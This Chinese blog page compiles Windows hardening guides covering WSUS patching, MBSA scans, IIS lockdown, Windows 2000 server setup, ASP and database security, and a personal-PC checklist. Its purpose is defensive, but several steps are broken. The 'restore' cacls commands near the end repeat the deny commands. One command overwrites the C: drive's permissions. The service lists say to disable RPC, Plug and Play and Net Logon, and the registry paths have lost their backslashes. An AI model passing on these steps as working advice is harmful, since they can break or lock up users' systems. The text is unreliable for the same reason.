cnlukai的博客
cnlukai的博客
欢迎访问cnlukai的博客
文章
企业网管安全防护3大招
重要指数:★★★★★
加固服务器和客户端的安全,把网络安全风险降至最低,可以通过补丁服务器(Server Update Service)来统一对企业内部的计算机进行统一安装补丁,使得网管的工作降到最低。
补丁服务器的重要性
图1显示了大多数攻击发生的时间,通过示意图,我们知道,部署SUS是防范网络被攻击的重要一环。
产品发行 漏洞被发现 漏洞被公开 发布更新
客户端部署更新大多数攻击发生此阶段
现在,有这样的趋势必须值得网管高度重视,系统漏洞公布与病毒爆发的间隔天数不断压缩,如Nimda病毒间隔331天、SQL Slammer病毒间隔180天、Blaster病毒间隔25天,Sasser病毒间隔11天,刚刚爆发的ANI蠕虫病毒更是缩短到一周!
微软补丁服务器有SUS和SMS。SUS是免费的,虽然相对于SMS,功能不如后者丰富,但能满足将服务器及客户端升级到最新的更新、安全更新和服务包的最基本要求,对中小型企业而言,选择MBSA和SUS是一个很不错的解决方案。
简单地说,SUS的作用就是定期从微软升级网站有选择的下载最新的更新、安全更新和服务包到本地,然后分发给它所管辖的客户端,客户端就不必在外网直接链接到Windows Update来更新了。
SUS操作注意事项
本文以目前最新版本的SUS 2.0为例进行讲解(下载地址:http://download.cpcw.com)。
关于SUS的配置和配置,微软发布了《Windows Server Update Services 入门循序渐进指南》、《Windows Server Update Services 自述文件中文文档》,有需要的网管可以下载参考,限于篇幅,我们不再对SUS具体的操作进行阐述。这里我们提供一些有用的技巧和要注意的地方。
一、手动启动 SUS 服务器检测。
在客户端上的命令提示符中运行“wuauclt.exe /detectnow”。此命令将指示自动更新立即连接到 SUS 服务器。如果执行此步骤,则可将客户端计算机立即连接到 SUS 服务器。这条命令很方便,网管一定要牢记。
二、在客户端上快速识别是否应用了SUS。
打开 %SystemRoot%windows 文件夹,查找“WindowsUpdate.log”,如果发现该日志文件则说明SUS已经成功的应用在该客户端上。
三、使客户端cookies过期。
SUS使用cookies在客户端存储各种类型的信息,其中包含客户端计算机组的成员信息(Client side),默认在SUS创建它以后的一个小时过期,使用以下命令可以立即更新组成员“wuauclt.exe /resetauthorization /detectnow”。
设置客户端需要注意的问题:
1. 在“运行”中执行gpedit.msc来打开组策略对象编辑器,依次展开“计算机配置”、“管理模板”、“Windows 组件”,然后单击“Windows Update”。
2. 在详细信息窗格中,单击“指定 Intranet Microsoft 更新服务位置”。
3. 同时在“为检测更新设置 Intranet 更新服务”和“设置 Intranet 统计服务器”中键入同一WSUS 服务器的 HTTP URL。例如,在上述两个文本框中键入 http://服务器名,其中服务器名是 WSUS 服务器的名称(图2)。
注意:客户端不支持Windows 9X,还有就是Windows XP Home没有组策略,为了能用上局域网中的SUS,只能用注册表来部署,将下面代码复制到记事本,并命名后缀名为reg的文件,导入注册表即可(本段代码可以在http://download.cpcw.com下载)。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftwindowsWindowsUpdate] "WUServer"=http://WSUS
"WUStatusServer"="http://WSUS" [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftwindowsWindowsUpdateAU]
"NoAutoUpdate"=dword:00000000
"AUOptions"=dword:00000003
"ScheduledInstallDay"=dword:00000000
"ScheduledInstallTime"=dword:00000003
"UseWUServer"=dword:00000001
"RescheduleWaitTime"=dword:00000005 "NoAutoRebootWithLoggedOnUsers"=dword:00000001
其中http://WSUS这一行要改成你安装sus服务器的地址。
第二招:为服务器加把安全锁
重要指数:★★★★
服务器通常是24x7全天候运行的,所以在这无人值守的期间里,要想保证服务器的安全,做一些安全加固措施还是有必要的。
Web服务器的安全
Windows 的Web 服务器是IIS,有关IIS安全的话题比较宽泛,这里只简单介绍利用微软提供的加强IIS安全的工具来加固安全性。
微软对IIS的防护提供了一些有用的工具,如IIS Lockdown Tool、UrlScan(下载地址:http://download.cpcw.com )。
应用这两个工具可以做到:禁用或者删除不必要的IIS服务和组件;修改默认配置,提高系统文件和Web内容目录的安全性;用URLScan来过滤HTTP请求。
用MBSA检查服务器
对服务器作一番安全基准检查是非常有必要的。微软官方提供了这样的一个工具,叫Microsoft基准安全分析器MBSA。MBSA Ver2.0.1包含图形和命令行界面,可以进行本地和远程扫描(图3)。
使用MBSA可以确保没有遗漏的安全漏洞,由于MBSA可以自动更新,所以应该定期使用以检查新出现的漏洞。
MBSA最新版本为2.1(下载地址:http://download.cpcw.com)。虽然MBSA没有中文版本,但却相当好用,不过还是有必要交代一下注意事项。
MBSA对Windows、Office、IIS等软件进行的扫描包括两种:安全扫描和更新扫描。
“安全扫描”是指扫描以上软件是否进行了安全的配置,如:IIS锁定工具是否已运行,文件系统的类型是否都采用了NTFS格式等。
“更新扫描”是指扫描以上软件是否安装了最新的补丁程序。
MBSA执行的是微软所谓的“基准扫描”,即只扫描和报告Windows Update定义的“关键更新”,而不是扫描和报告所有的更新。而且MBSA不会自动安装更新,需用户另行操作完成。否则,漏洞依然存在。
MBSA是基于IE页面开发的,所以要运行MBSA需要 Internet Explorer 5.01 以上才行,而且IE的所有设置项都会影响MBSA的运行。
每次扫描后生成的安全报告是以明码格式保存到固定的文件夹中。因此,容易被黑客利用从而找出计算机的漏洞所在。所以应对安全报告另行处理(如打印、备份到其它目录等),然后彻底删除“SecurityScans”文件夹中的所有文件,以防被他人利用。
重要指数:★★★
对于客户端而言,未采取域的,自然就没有应用域上的组策略,也就不能按照域控制器上的组策略配合SUS服务器进行安全更新。这时,我们可以采取主动检测系统漏洞的方法。
采用MBSA或360安全卫士(图4)等带有检测系统漏洞并打补丁的功能的安全产品来完成。如果限于条件,企业网络没有SUS补丁服务器的话,上述措施就显得更有必要了。
另外,作为企业网管,还应该发布安全公告,通知客户端用户采取以下措施。
1. 使用基于主机的防火墙;安装病毒防护软件,升级到最新病毒库。
2. 不要随意运行来历不明的文件、不随意访问不明网站。
专家建议
有条件的企业,可以成立主动防病毒响应小组,制定值班制度负责监视外部的恶意软件警报站点以预警恶意软件的攻击。
建立网络安全及病毒事件出现后的应急机制和处置方案,由专人负责事件处理工作。确保企业在网络安全及病毒事件发生时能做好及时有效的处理,防止病毒感染,遏制病毒扩散,最大限度降低病毒发作带来的损失。
企业可以根据实际情况来安排节日期间的值班,如遇问题联络国家计算机病毒应急处理中心或当地公共信息网络安全监察部门。做好物理安全也不容忽视,如防盗、禁止无关人员接近服务器。
正确的学习顺序
1、C++
2、windows编程
3、2D--3D
4、Direct3D
5、windows网络编程Socket
6、汇编、计算机组成原理、数学、物理学、图形学等
WIN2k服务器的正确安装与安全配置(一)
一. 定制自己的Windows 2000 Server
(1)版本的选择:
Windows 2000有各种语言的版本,对于我们来说,可以选择英文版或简体中文版。强烈建议,在语言不成为障碍的情况下,请一定使用英文版。要知道,微软的产品是以Bug & Patch而著称的,中文版的Bug远远多于英文版,而补丁一般还会迟至少半个月(也就是说一般微软公布了漏洞后你的机子还会有半个月处于无保护状况)。
(2)分区和逻辑盘的分配:
有一些朋友为了省事,将硬盘仅仅分为一个逻辑盘,所有的系统文件、日志文件、应用软件都装在C盘上,而黑客的攻击通常就是利用应用程序所存在的漏洞进入系统,然后通过系统文件内的相关程序提升权限,从而来删除日志文件(防止管理员对其进行调查),对系统文件进行破坏。建议最少建立三个分区(NTFS格式),一个系统分区(只安装系统和杀毒软件,
(3)安装顺序的选择:Windows 2000在安装中有几个顺序是一定要注意的:
首先,何时接入网络。Windows 2000在安装时有一个漏洞,在你输入Administrator密码后,系统就建立了ADMIN$的共享,但是并没有用你刚刚输入的密码来保护它,这种情况一直持续到你再次启动后,在此期间,任何人都可以通过ADMIN$进入你的机器;同时,只要安装一完成,各种服务就会自动运行,而这时的服务器是满身漏洞,非常容易进入的,因此,在完全安装并配置好Windows 2000之前,一定不要把主机接入网络。
其次,补丁的安装。补丁的安装应该在所有应用程序安装完之后,因为补丁程序往往要替换/修改某些系统文件,如果先安装补丁再安装应用程序有可能导致补丁不能起到应有的效果。例如,IIS的HotFix就要求每次更改IIS的配置都需要安装。
Win2k系统正确的安装顺序应该是:
硬盘分区-选择操作系统安装-选择文件系统格式(NTFS)-选择组件及应用程序-安装各种系统补丁-安装防火墙等做好安全防范措施-接入internet
(4)操作系统组件的定制:
Windows 2000在默认情况下会安装一些常用的组件。但是,这个默认安装是极度危险的。你应该确切地知道你需要哪些服务,而且仅仅安装你确实需要的服务。根据安全原则,最少的服务+最小的权限=最大的安全。安装系统组件时不要选择”索引服务”组件。典型的Web服务器需要的最小组件选择是:只安装IIS的IIS Snap-In(IIS服务管理器)、WWW Server(WWW服务器)、ComFiles(公用文件)组件。如果你确实需要安装其他组件,请慎重,特别是Indexing Service、FrontPage 2000 Server Extensions、Internet Service Manager(HTML)这几个危险服务。另外,安装网卡添加协议时也要尽量少的选择相关协议。
(5)远程管理应用程序的选择:
选择一个好的远程管理软件是非常重要的事,这不仅仅是安全方面的要求,也是应用方面的需要。Windows 2000的终端服务是基于RDP(远程桌面协议)的远程控制软件,它速度快,操作方便,比较适合用来进行常规操作。但是,终端服务也有其不足之处,由于它使用的是虚拟桌面,当你使用终端服务进行安装软件或重启服务器等与真实桌面交互的操作时,往往会出现哭笑不得的现象,例如,使用终端服务重启微软的认证服务器(Compaq, IBM等)可能会直接关机。所以,为了安全起见,建议再配备一个远程控制软件作为辅助,与终端服务互补,如PcAnyWhere就是一个不错的选择。
(6)删除默认共享
在HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\LANMANSERVER\PARAMETERS目录下,创建Autoshareserver的键值,类型为DWORD(双字节)且值为0,来禁止这些共享;再创建一个键值为Autosharewks的双字节值,修改键值为0。最后,请重新启动计算机使更改生效
IPC$共享无法删除
(不选择“文件夹和打印机共享协议”)
(7)手动查找并清除木马程序
1.查看系统注册表。
通过查看以下主键:
HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN或RUNSERVERS
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN或RUNSERVERS
下面是否有Netsky.exe,空格.exe等可疑文件名,并手动删除键值和相应的程序。
2.使用第三方软件,如 The Cleaner等。
(8)禁止不必要的服务
Win2k有许多用不着的服务自动处于激活状态,为了系统的安全,应把该关的功能服务及时关闭,从而减少安全风险。
需要禁止的服务如下:
alerter
application management
clipbook
com+ event system
computer browser
distributed link tuacking client
distributed transaction coordinator
fax service
ftp publishing service
indexing service
messenger
net logon
network dde
network dde dsdm
network monitor
netmeeting remote desktop sharing
plug and play
remote procedure call(RPC)
remote registry service
removable storage
routing and remote access
runas service
server
smart card
smart card helper
task schedule
tcp/ip netbios helper
telephone service
windows management instrumentation
必要时需要禁止的服务如下:
Snmp service
snmp trap
ups
(9)操作系统日志的安全问题
系统日志文件保存目录默认位置:
安全日志文件存放位置:c:\winnt\system32\config\secevent.evt (*)
系统日志文件存放位置:c:\winnt\system32\config\sysevent.evt (*)
应用程序日志文件存放位置:c:\winnt\system32\config\appevent.evt (*)
ftp日志默认位置:c:\winnt\system32\logfiles\msftpsvc1\
www日志默认位置:c:\winnt\system32\logfiles\w3svc1\ (*)
定时(scheduler)服务日志默认位置:系统安装目录\schedlgu.txt
安全日志文件、系统日志文件、应用程序日志文件,这三个日志记录都由系统的event log服务生成的(其中安全日志文件、系统日志文件只有系统管理员才能访问),event log的作用时记录程序和windows发送的时间消息。事件日志包含对诊断问题有所帮助的信息。停止和启动该服务就停止或开始记录上述三个日志文件。
上述三个日志文件事件查看器的dos命令为:eventvwr.msc(修改日志文件大小及存储时间)。打开事件查看器,右键点击相应的项目的“属性”项,在“常规”标签页面下,对日志文件的大小和达到文件大小时相应的事件进行设置(记录60天)。
ftp日志和www日志均是在internet信息服务里面配置和控制。
限制一般用户对日志文件的访问,禁止一般权限的用户去查看日志文件。设置只有管理员才可以对以上提到的系统日志文件有操作权限;小心保护管理员的密码和用户。并养成定时、定期备份日志的习惯。
win2k提供了安全日志分析器(cybersafe log analyst CLA工具)
日志管理软件 surfstats log analyzer 4.6
(10)目录和文件选项
对可上传的目录和数据库目录均不可给“执行”权限,
日志目录,只许读取和写入
非系统分区的everyone着好的权限去掉,只给管理员权限,在系统分区,不给everyone等其他次要帐号写权限,可在适当地方给读权限,
其他文件的权限设置:如:c:/winnt/system32下的cmd.exe,format.exe,ftp和tftp.exe等,不给system(系统权限)对cmd的任何权限,只给管理员权限,也可设置为只读
1、权限是累计的,
2、拒绝的权限比允许的高(决决策略会先执行)
3、文件权限比文件目录权限高
4、仅给用户必需的权限,最小化原则
(11)进行系统日志审核
Windows 2k的默认安装是不开启任何安全审核的。到“本地安全策略”的“审核策略”中打开相应的审核。推荐的审核是:
策略更改成功/失败
登录事件 成功/失败
对象访问 失败
目录服务访问 失败
特权使用 失败
系统事件 成功/失败
账户登录事件 成功/失败
账户管理 成功/失败
对文件和文件夹访问的审核。首先该文件和文件夹必须位于NTFS分区上,其次必须为对象访问事件设置审核策略。设置的步骤如下:在“审核”页面上,点击“添加”,选择想对文件或文件夹访问进行审核的用户,单击“确定”;在“审核项目”对话框中,为想要审核的事件选择“成功”或“失败”复选框,选择“完成”后确定。
同时,terminal service(远程服务)的安全日志默认时也不开的,可以在“管理工具-terminal service configuration-权限-高级”中配置安全审核,只要记录登录、注销事件就可以了。
审核项目少的缺点时万一想看却发现没有记录就一点都没辙;审核项目太多不仅会占用系统资源而且会导致失去了审核的意义。
(12)端口和Ipsec(端口监控监听程序inzider)
端口是计算机和外部网络相连的逻辑接口,也是计算机的第一道屏障,端口配置正确与否直接影响到主机的安全。一般来说,仅打开你需要使用的端口会比较安全,配置的方法:打开“本地连接属性”对话框,依次点击“Internet协议(TCP/IP)→高级→选项→TCP/IP筛选→属性”,在打开的对话框中启用TCP/IP筛选(只开放tcp80端口)。
不过,对于win2k的端口过滤来说有一个不好的特性:只能规定开哪些端口,这样对于需要开大量的用户就比较麻烦。
dos命令:netstat –abnov
(13)Windows 2000 安全注意事项
检查、更新和部署提供的 Hisecweb.inf 安全模板
我们已在附带的 CD 上包括了名为 Hisecweb.inf 的安全模板,它可作为适用于多数安全 Web 站点的基准。该模板配置基本的 Windows 2000 全系统策略。
执行以下步骤,以使用该模板:
1. 将该模板复制到 %windir%\security\templates 目录。
2. 打开“安全模板”工具,查看这些设置。
3. 打开“安全配置和分析”工具,然后装载该模板。
4. 右键单击“安全配置和分析”工具,然后从上下文菜单中选择“立即分析计算机”。
5. 等候操作完成。
6. 查看结果,如有必要就更新该模板。
7. 如果您已对该模板满意,右键单击“安全配置和分析”工具,然后从上下文菜单中选择“立即配置计算机”。
配置 IPSec 策略
应该认真考虑在每台 Web 服务器上设置 Internet Protocol Security (IPSec) 数据包筛选策略。该策略可提供更高级别的安全性,以防止防火墙被破坏。使用多层安全技术通常是很好的做法。
通常,除那些希望支持的协议和要打开的端口之外,其它所有的 TCP/IP 协议都应闭锁。可以使用 IPSec 管理工具或 IPSecPol 命令行工具部署 IPSec 策略。
确保 Telnet Server 的安全
如果打算使用 Windows 2000 中包括的 Telnet Server,应该考虑限制可访问该服务的用户。要进行这一设置,可执行以下步骤:
1. 打开“本地用户和组”工具。
2. 右键单击“组”节点,然后从上下文菜单中选择“新建组”。
3. 在“组”名框中输入 TelnetClients。
4. 单击“添加”,然后添加对该计算机有远程登录权限的用户。
5. 依次“创建”和“关闭”。
TelnetClients 组存在时,Telnet 服务将只允许在组中定义的那些用户访问该服务器。
(14)系统安全小结
经常访问微软网站,学习相关信息、技术等
经常访问微软升级程序站点,了解补丁的最新发布情况。
订阅微软安全公告,及时了解最新的系统漏洞。
安装重要升级通告服务。定期运行安全扫描工具或经常阅读网上相关的漏洞分析资料。微软提供了一个叫microsoft baseline security analyzer的工具,可以定期检测系统漏洞、IIS漏洞、弱口令等(详见附录)。
二.确保 Internet 信息服务 5.0 和 5.1 的安全
(详见附录1)
三.ASP程序的安全问题
安全不仅是网管的事,编程人员也必须在安全细节上注意,养成良好的安全习惯,否则也会给黑客造成可乘之机。
目前大多数网站上的ASP程序多少都有安全漏洞,但是如果写程序的时候注意的话,还是可以避免的。 分分涉及用户名与口令的程序最好封装在服务器端,尽量少的在asp文件里出现,涉及到与数据库连接的用户名与口令应给予最小的权限。说明:用户名与口令是黑客们最感兴趣的东西,如果通过某种方式看到源代码,后果是严重的。因此要尽量减少它们在asp文件中的出现次数。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及到与数据库连接,理想状态下只给它以执行存储过程的权限,不要直接给予该用户以修改、插入、删除记录的权限。
需要经过验证的asp页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。说明:需要经过验证的asp程序多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入,因此有必要跟踪上一个页面。
防止asp主页.inc文件泄漏问题,当存在asp的主页正在制作并没有进行最后调试完成以前,可能被某些搜索引擎机动追加为搜索对象,如果这时有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中察看到数据库地点和结构的细节揭示完整的源代码。说明:程序员应该在网页发布前对其进行彻底的调试,安全专家需要固定asp包含文件以便外部的用户不能看它们。首先对.inc文件使用户无法从浏览器直接观看文件的源代码。.inc文件的文件名不能使用系统默认的或有特殊含义容易被用户猜测到的,尽量使用无规则的英文字母。
某些asp编辑器会自动备份asp文件,会被下载的漏洞在某些编辑asp程序的工具,当创建或修改一个asp文件时,编辑器会自动创建一个备份文件,比如:ultraedit就会备份一个..bak文件,如创建或修改了some.asp,编辑器自动生成一个叫some.asp.bak文件,如果没有删除这个bak文件,攻击有可能直接下载some.asp.bak文件,这样some.asp的源程序就会被下载。
在处理类似留言板、BBS等输入框的asp程序中,最好屏蔽掉HTML、javascript、vbscript语句,如无特殊要求,可以限定只允许输入字母与数字,屏蔽掉特殊字符;同时对输入字符的长度进行限制。而且不但在客户端进行输入合法性检查,同时要在服务器端程序中进行类似检查。说明:输入框是黑客利用的一个目标,它们可以通过输入脚本语言等对用户客户端造成损坏;如果该输入框涉及到数据查询,他们会利用特殊查询输入得到更多的数据库数据,甚至是表的全部。因此必须对输入框进行过滤,但如果为提高效率仅在客户端进行输入合法性检查,仍有可能被绕过,因此必须在服务器端再做一次检查。
四.数据库的安全问题
(1)ACCESS数据库的安全问题。
防止ACCESS mdb数据库有可能被下载的漏洞,在用ACCESS做后台数据库是,如果有人通过各种方法知道或猜到了服务器的ACCESS数据库的路径和数据库名称,那么他就能够下载这个ACCESS数据库文件,这是十分危险的。
解决方法:
a.为数据库取个复杂、非正规的名字
b.不要把数据库名写在程序内,否则万一给人拿到了源代码,那数据库的结构和名字就一览无遗。建议使用ODBC。
c.使用ACCESS对数据库进行编码和加密,这样即使他人得到了数据库,没有密码他也无法打开。
(2)SQL SERVER数据库的安全问题。
SQL SERVER是NT平台上使用最多的数据库系统,但是他的安全问题也必须引起重视。
及时更新补丁程序
说明:与NT 一样,SQL SERVER的许多漏洞会由补丁程序来弥补,建议在安装补丁程序前现在测试机器上做测试,同时提前作好目标服务器的数据备份。
给SA一个复杂的口令
说明:SA具有对SQL SERVER数据库操作的全部权限。但是编程人员往往只注重编写SQL语句本身,对SQL SERVER数据库的管理却不太重视,这样很有可能造成SA口令为空。这对数据库安全是个严重威胁。
严格控制数据库用户的权限,轻易不要给用户对于表的查询、更改、插入、删除等权限,可以给用户访问视图的权限,以及只具有执行存储过程的权限。
说明:用户如果对表有直接的操作权限,就会存在数据被破坏的危险。
(3)ASP中五种连接数据库的方法
第一种 - 这种方法用在ACCESS中最多
strconn = "DRIVER=Microsoft Access Driver (*.mdb);DBQ=" & Server.MapPath("aspfree.mdb")
set conn = server.createobject("adodb.connection")
conn.open strconn
第二种-这种方法用在SQL SERVER中多
dim conn, conntol
conntol = "driver={SQL Server};server=服务器名字;uid=登陆帐号;pwd=登陆密码;database=数据库名字"
set conn=server.createobject("adodb.connection")
conn.open conntol
另一种连接方法:
dim conn
set conn=server.createobject("ADODB.connection")
conn.open "PROVIDER=SQLOLEDB;DATA SOURCE=IP;UID=帐号;PWD=密码;DATABASE=hcgood"
第三种
strconn="Driver={MicrosoftAccessDriver(*.mdb)};" &_
"DBQ=F:Inetpubwwwrootsomedirdb1.mdb;DefaultDir=f:Inetpubwwwrootsomedir;
&_ uid=LoginID;" &_
"pwd=Password;DriverId=25;FIL=MSAccess;" set conn = server.createobject("adodb.connection")
conn.open strconn
第四种运用系统数据源
The following uses a Data Source Name:
set conn = server.createobject("adodb.connection")
conn.open "Example"
第五种运用ODBC数据源,前提是你必须在控制面板的ODBC中设置数据源
set rs = server.createobject("adodb.recordset")
rs.open "tblname", "DSNName", 3, 3
常 数 常 数 值 说 明
AdOpenForwardOnly 0 启动只能向前( Forward-only )的游标,缺省值
AdOpenKeyset 1 启动 Keyset 类型的游标
AdOpenDynamic 2 启动 Dynamic 类型的游标
AdOpenStatic 3 启动 Static 类型的游标
LockType 参数表示采用的 Lock 类型。
常 数 常 数 值 说 明
AdLockReadOnly 1 以只读方式启动,无法运行 AddNew、Update、Delete 等方法,缺省值
AdLockPessimistic 2 当数据正在更新时,系统会暂时锁定其它用户
的动作,以确保数据一致性
AdLockOptimistic 3 当数据正在更新时,系统不会暂时锁定其它用户的动作
AdLockBatchOptimistic 4 当数据正在更新时,其它用户必须将 CursorLocation 属性设为 adUseBatch ,才能对数据库操作
Options 参数表示对数据库请求的类型。
常 数 常 数 值 说 明
AdCmdUnknown -1 所指定的 CommandText 参数类型无法确定,缺省值
AdCmdText 1 所指定的 CommandText 参数是一般的命令类型
AdCmdTable 2 所指定的 CommandText 参数是一个存在的表名称
AdCmdStoredProc 3 所指定的 CommandText 参数是 Stored Procedure 表名称
打造个人电脑安全终极防线.
声明:
本文并非本人所著,是本人一个朋友整理实践而来的.适用于Windows 2000以上版本.本文所涉及到的实验在Windwos 2003下通过)
---------------
打造个人电脑安全终极防线.
----------------------------------------
【一、禁止默认共享 】
1.先察看本地共享资源
运行-cmd-输入net share
2.删除共享(每次输入一个)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3.删除ipc$空连接
在运行内输入regedit
在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA
项里数值名称RestrictAnonymous的数值数据由0改为1.
4.关闭自己的139端口,ipc和RPC漏洞存在于此.
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”
属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关
闭了139端口,禁止RPC漏洞.
----------------------------------------
【二、设置服务项,做好内部防御】
-------------------
A计划.服务策略:
控制面板→管理工具→服务
关闭以下服务:
1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接跟踪客户端服务]
5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]
6.IMAPI CD-Burning COM Service[管理 CD 录制]
7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
8.Kerberos Key Distribution Center[授权协议登录网络]
9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]
10.Messenger[警报]
11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
14.Print Spooler[打印机服务,没有打印机就禁止吧]
15.Remote Desktop Help Session Manager[管理并控制远程协助]
16.Remote Registry[使远程计算机用户修改本地注册表]
17.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持
而使用户能够共享文件、打印和登录到网络]
21.Telnet[允许远程用户登录到此计算机并运行程序]
22.Terminal Services[允许用户以交互方式连接到远程计算机]
23.Windows Image Acquisition (WIA)[照相服务,应用与数码摄象机]
-------------------
B计划.帐号策略:
一.打开管理工具.本地安全设置.密码策略
1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是10
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的加密来存储密码 禁用
-------------------
C计划.本地策略:
打开管理工具
找到本地安全设置.本地策略.审核策略
1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
然后再到管理工具找到
事件查看器
应用程序 右键 属性 设置日志大小上限 我设置了512000KB 选择不覆盖事件
安全性 右键 属性 设置日志大小上限 我也是设置了512000KB 选择不覆盖事件
系统 右键 属性 设置日志大小上限 我都是设置了512000KB 选择不覆盖事件
-------------------
D计划.安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,启用比较好,但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.重命名来宾帐户guest [最好写一个自己能记住中文名]让黑客去猜解guest吧,而且还得删除这个帐户,后面有详细解释]
9.帐户.重命名系统管理员帐户[建议取中文名]
-------------------
E计划.用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过终端允许登陆 删除Remote Desktop Users
---------------------
F计划.终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
---------------------
G计划.用户和组策略
打开管理工具
计算机管理.本地用户和组.用户
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不组了.分经验的(不管他.默认设置)
---------------------
X计划.DIY策略[根据个人需要]
1.当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.
2.登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3.对匿名连接的额外限制
4.禁止按 alt+crtl+del
5.允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6.只有本地登陆用户才能访问cd-rom
7.只有本地登陆用户才能访问软驱
8.取消关机原因的提示
1、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
2、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
3、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
4、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9.禁止关机事件跟踪
开始“Start ->”运行“ Run ->输入”gpedit.msc “,在出现的窗口的左边部分,
选择 ”计算机配置“(Computer Configuration )-> ”管理模板“
(Administrative Templates)-> ”系统“(System),在右边窗口双击
“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),
点击然后“确定”(OK)保存后退出这样,你将看到类似于windows 2000的关机窗口
----------------------------------------
【三、修改权限防止病毒或木马等破坏系统】
winxp、windows2003以上版本适合本方法.
因为目前的木马抑或是病毒都喜欢驻留在system32目录下,如果我们用命令限制system32的写入和修改权限的话
那么,它们就没有办法写在里面了.看命令
---------------------
A命令
cacls C:windowssystem32 /G administrator:R 禁止修改、写入C:windowssystem32目录
cacls C:windowssystem32 /G administrator:F 恢复修改、写入C:windowssystem32目录
呵呵,这样病毒等就进不去了,如果你觉得这个还不够安全,
还可以进行修改觉得其他危险目录,比如直接修改C盘的权限,但修改c修改、写入后,安装软件时需先把权限恢复过来才行
---------------------
B命令
cacls C: /G administrator:R 禁止修改、写入C盘
cacls C: /G administrator:F 恢复修改、写入C盘
这个方法防止病毒,
如果您觉得一些病毒防火墙消耗内存太大的话
此方法稍可解决一点希望大家喜欢这个方法^_^
---------------------
X命令
以下命令推荐给高级管理员使用[因为win版本不同,请自行修改参数]
cacls %SystemRoot%system32cmd.exe /E /D IUSR_ComSpec 禁止网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32cmd.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp32.exe
